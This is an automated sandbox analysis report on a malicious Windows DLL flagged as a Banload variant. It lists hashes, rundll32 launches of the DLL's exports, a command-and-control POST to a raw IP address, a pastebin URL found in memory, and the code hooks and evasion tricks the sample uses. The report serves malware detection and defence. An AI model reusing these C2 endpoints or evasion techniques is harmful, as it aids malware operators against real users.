Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Y7KU3yvGQ6.dll

Overview

General Information

Sample name:Y7KU3yvGQ6.dll
renamed because original name is a hash value
Original sample name:ed7c5857a2a61a69f73ca5f01c0f1c8c.dll
Analysis ID:1572153
MD5:ed7c5857a2a61a69f73ca5f01c0f1c8c
SHA1:ac4c87194f5b5b731c616bcc9873f8397796e686
SHA256:b3243d65c7b8bea56f75411c660afbc43e701b4cd453b47e61fb5a797a2e6c18
Tags:dlluser-abuse_ch
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Machine Learning detection for sample
Overwrites code with function prologues
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Switches to a custom stack to bypass stack traces
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Entry point lies outside standard sections
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7528 cmdline: loaddll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7672 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 6944 cmdline: rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • WerFault.exe (PID: 7356 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6944 -s 776 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 7692 cmdline: rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,GetInstallDetailsPayload MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5988 cmdline: rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,SignalInitializeCrashReporting MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 1436 cmdline: rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,TMethodImplementationIntercept MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 3452 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 768 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 1224 cmdline: rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",GetInstallDetailsPayload MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 736 cmdline: rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",SignalInitializeCrashReporting MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6748 cmdline: rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",TMethodImplementationIntercept MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 3104 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6748 -s 768 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 6196 cmdline: rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",dbkFCallWrapperAddr MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 2288 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6196 -s 768 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 7824 cmdline: rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",__dbk_fcall_wrapper MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-10T07:26:51.667714+010028335771Malware Command and Control Activity Detected192.168.2.1049746192.124.216.1480TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: Y7KU3yvGQ6.dllAvira: detected
Multi AV Scanner detection for submitted file
Source: Y7KU3yvGQ6.dllReversingLabs: Detection: 55%
Source: Y7KU3yvGQ6.dllVirustotal: Detection: 44%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
Machine Learning detection for sample
Source: Y7KU3yvGQ6.dllJoe Sandbox ML: detected
Source: Y7KU3yvGQ6.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
Source: Y7KU3yvGQ6.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2833577 - Severity 1 - ETPRO MALWARE Banload Variant CnC Activity : 192.168.2.10:49746 -> 192.124.216.14:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.124.216.14 80Jump to behavior
Source: global trafficHTTP traffic detected: POST /conta/index.php HTTP/1.0Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 0Host: 192.124.216.14Accept: text/html, */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Source: unknownTCP traffic detected without corresponding DNS query: 192.124.216.14
Source: unknownTCP traffic detected without corresponding DNS query: 192.124.216.14
Source: unknownTCP traffic detected without corresponding DNS query: 192.124.216.14
Source: unknownTCP traffic detected without corresponding DNS query: 192.124.216.14
Source: unknownTCP traffic detected without corresponding DNS query: 192.124.216.14
Source: unknownHTTP traffic detected: POST /conta/index.php HTTP/1.0Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 0Host: 192.124.216.14Accept: text/html, */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Source: rundll32.exeString found in binary or memory: http://192.124.216.14/conta/index.php
Source: rundll32.exe, 00000004.00000002.1839038476.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2547697268.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1771573428.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.1832986778.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1894247823.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1874677140.000000006A081000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://192.124.216.14/conta/index.phpU
Source: Amcache.hve.11.drString found in binary or memory: http://upx.sf.net
Source: rundll32.exe, rundll32.exe, 00000006.00000002.2544670211.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2547697268.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1771573428.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1771012396.0000000004C50000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.1768168983.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.1832986778.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000003.1783546072.00000000046C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.1894247823.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1893636039.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1874677140.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1874062186.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1834981367.0000000004D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.indyproject.org/
Source: rundll32.exe, rundll32.exe, 00000006.00000002.2547697268.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1771573428.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.1832986778.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1894247823.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1874677140.000000006A081000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://pastebin.com/raw/vn1EtvP0

System Summary

barindex
PE file contains section with special chars
Source: Y7KU3yvGQ6.dllStatic PE information: section name: .#>*
Source: Y7KU3yvGQ6.dllStatic PE information: section name: .:!0
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\MusterJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6944 -s 776
Source: Y7KU3yvGQ6.dllStatic PE information: Number of sections : 12 > 10
Source: Y7KU3yvGQ6.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
Source: classification engineClassification label: mal96.evad.winDLL@26/17@0/1
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6196
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1436
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6748
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Aplicativo-Vaister
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6944
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\5feea20a-b72a-434b-8e0f-c178f89134c6Jump to behavior
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,GetInstallDetailsPayload
Source: Y7KU3yvGQ6.dllReversingLabs: Detection: 55%
Source: Y7KU3yvGQ6.dllVirustotal: Detection: 44%
Source: rundll32.exeString found in binary or memory: jp-ocr-hand-add
Source: rundll32.exeString found in binary or memory: JIS_C6229-1984-b-add
Source: rundll32.exeString found in binary or memory: jp-ocr-b-add
Source: rundll32.exeString found in binary or memory: JIS_C6229-1984-hand-add
Source: rundll32.exeString found in binary or memory: ISO_6937-2-add
Source: rundll32.exeString found in binary or memory: NATS-SEFI-ADD
Source: rundll32.exeString found in binary or memory: NATS-DANO-ADD
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,GetInstallDetailsPayload
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,SignalInitializeCrashReporting
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,TMethodImplementationIntercept
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6944 -s 776
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",GetInstallDetailsPayload
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",SignalInitializeCrashReporting
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",TMethodImplementationIntercept
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",dbkFCallWrapperAddr
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",__dbk_fcall_wrapper
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 768
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6196 -s 768
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6748 -s 768
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,GetInstallDetailsPayloadJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,SignalInitializeCrashReportingJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,TMethodImplementationInterceptJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",GetInstallDetailsPayloadJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",SignalInitializeCrashReportingJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",TMethodImplementationInterceptJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",dbkFCallWrapperAddrJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",__dbk_fcall_wrapperJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: magnification.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: security.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow found: window name: TEditJump to behavior
Source: Y7KU3yvGQ6.dllStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: Y7KU3yvGQ6.dllStatic file information: File size 17234944 > 1048576
Source: Y7KU3yvGQ6.dllStatic PE information: Raw size of .:!0 is bigger than: 0x100000 < 0x106e400
Source: Y7KU3yvGQ6.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: initial sampleStatic PE information: section where entry point is pointing to: .:!0
Source: Y7KU3yvGQ6.dllStatic PE information: section name: .didata
Source: Y7KU3yvGQ6.dllStatic PE information: section name: .R6V
Source: Y7KU3yvGQ6.dllStatic PE information: section name: .#>*
Source: Y7KU3yvGQ6.dllStatic PE information: section name: .:!0

Hooking and other Techniques for Hiding and Protection

barindex
Overwrites code with function prologues
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 7763BA30 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 77064D90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 7707EBF0 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 755C8A90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 755F0230 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 7763BA30 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 77064D90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 7707EBF0 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 755C8A90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 755F0230 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1224 base: 7763BA30 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1224 base: 77064D90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1224 base: 7707EBF0 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1224 base: 755C8A90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1224 base: 755F0230 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 736 base: 7763BA30 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 736 base: 77064D90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 736 base: 7707EBF0 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 736 base: 755C8A90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 736 base: 755F0230 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7824 base: 7763BA30 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7824 base: 77064D90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7824 base: 7707EBF0 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7824 base: 755C8A90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7824 base: 755F0230 value: 8B FF 55 8B EC Jump to behavior
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: F50005 value: E9 8B 2F 72 76 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 77672F90 value: E9 7A D0 8D 89 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: F60005 value: E9 2B BA 6D 76 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 7763BA30 value: E9 DA 45 92 89 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: F70008 value: E9 8B 8E 71 76 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 77688E90 value: E9 80 71 8E 89 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 10A0005 value: E9 8B 4D FC 75 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 77064D90 value: E9 7A B2 03 8A Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 10B0005 value: E9 EB EB FC 75 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 7707EBF0 value: E9 1A 14 03 8A Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 10C0005 value: E9 8B 8A 50 74 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 755C8A90 value: E9 7A 75 AF 8B Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 10D0005 value: E9 2B 02 52 74 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 755F0230 value: E9 DA FD AD 8B Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 2890005 value: E9 8B 2F DE 74 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 77672F90 value: E9 7A D0 21 8B Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 28B0005 value: E9 2B BA D8 74 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 7763BA30 value: E9 DA 45 27 8B Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 28C0008 value: E9 8B 8E DC 74 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 77688E90 value: E9 80 71 23 8B Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 42A0005 value: E9 8B 4D DC 72 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 77064D90 value: E9 7A B2 23 8D Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 42B0005 value: E9 EB EB DC 72 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 7707EBF0 value: E9 1A 14 23 8D Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 42C0005 value: E9 8B 8A 30 71 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 755C8A90 value: E9 7A 75 CF 8E Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 42D0005 value: E9 2B 02 32 71 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 755F0230 value: E9 DA FD CD 8E Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 2AF0005 value: E9 8B 2F B8 74 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 77672F90 value: E9 7A D0 47 8B Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 2B00005 value: E9 2B BA B3 74 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 7763BA30 value: E9 DA 45 4C 8B Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 4370008 value: E9 8B 8E 31 73 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 77688E90 value: E9 80 71 CE 8C Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 4390005 value: E9 8B 4D CD 72 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 77064D90 value: E9 7A B2 32 8D Jump to behavior
